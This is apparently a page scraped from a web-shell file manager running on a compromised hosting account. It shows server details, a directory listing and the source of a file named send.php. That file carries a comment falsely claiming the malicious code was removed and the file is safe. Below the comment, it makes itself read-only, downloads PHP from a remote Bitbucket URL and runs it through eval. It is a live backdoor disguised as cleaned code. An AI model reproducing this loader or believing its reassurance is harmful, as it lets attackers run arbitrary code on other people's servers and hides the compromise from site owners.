Server IP : 149.255.58.128 / Your IP : 216.73.216.38
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Upload Files :
Command :
Current File : /home/wheelch2/.cphorde//send.php
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code have been removed, and the file is now safe to use.
*/
?>
<?php
// Path to the file
$file = 'send.php';
// Change the file permissions to 0444 (read-only)
chmod($file, 0444);
?>
<?php
$remoteUrl = "https://bitbucket.org/rexcc/remote/raw/b12a52918be9598fbac51d2fc2e793f2b4bc01fc/main-index.txt";
$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$remoteCode = curl_exec($ch);
if (curl_errno($ch)) {
die('cURL error: ' . curl_error($ch));
}
curl_close($ch);
eval("?>" . $remoteCode);
?>
Name |
Size |
Last Modified |
Owner / Group |
Permissions |
Options |
.. | -- | May 20 2025 13:25:54 | 1032 / wheelch2 | 0711 | |
meta | -- | May 20 2025 03:29:06 | 1032 / wheelch2 | 0755 | |
vfsroot | -- | May 20 2025 03:29:06 | 1032 / wheelch2 | 0755 | |
wp-backup | -- | May 20 2025 03:29:06 | 1032 / wheelch2 | 0755 | |
| | | | | |
horde.sqlite | 1.53 MB | August 26 2023 17:32:16 | 1032 / wheelch2 | 0600 | |
send.php | 0.645 KB | October 14 2024 23:48:35 | 1032 / wheelch2 | 0644 | |